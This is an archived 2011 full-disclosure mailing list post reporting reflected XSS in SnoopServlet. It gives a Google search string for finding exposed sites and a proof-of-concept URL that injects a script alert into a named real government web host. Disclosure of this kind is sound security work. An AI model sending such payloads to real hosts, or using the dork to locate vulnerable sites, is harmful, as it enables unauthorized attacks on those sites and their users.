full-disclosure-uk July 2011 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] SnoopServlet vuln to xss

[Full-disclosure] SnoopServlet vuln to xss

From: Saleh <q8mosfet_at_nospam>
Date: Sat Jul 02 2011 - 08:24:41 GMT
To: full-disclosure@lists.grok.org.uk

SnoopServlet simply echos back the request line and the headers that
were sent by the client, plus any HTTPS information.

Search Google for: j2ee/servlet/snoopservlet to find a lot of vuln sites.

PoC:
http://apad1.aduana.gob.bo:7777/j2ee/servlet/SnoopServlet/%3Cscript%3Ealert%28%27bo9lo7%27%29%3C/script%3E

-- Saleh Alsanad PACI computer engineer q8mosfet@gmail.com I'm an FSF member -- Help us support software freedom! http://www.fsf.org/jf?referrer=2442 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/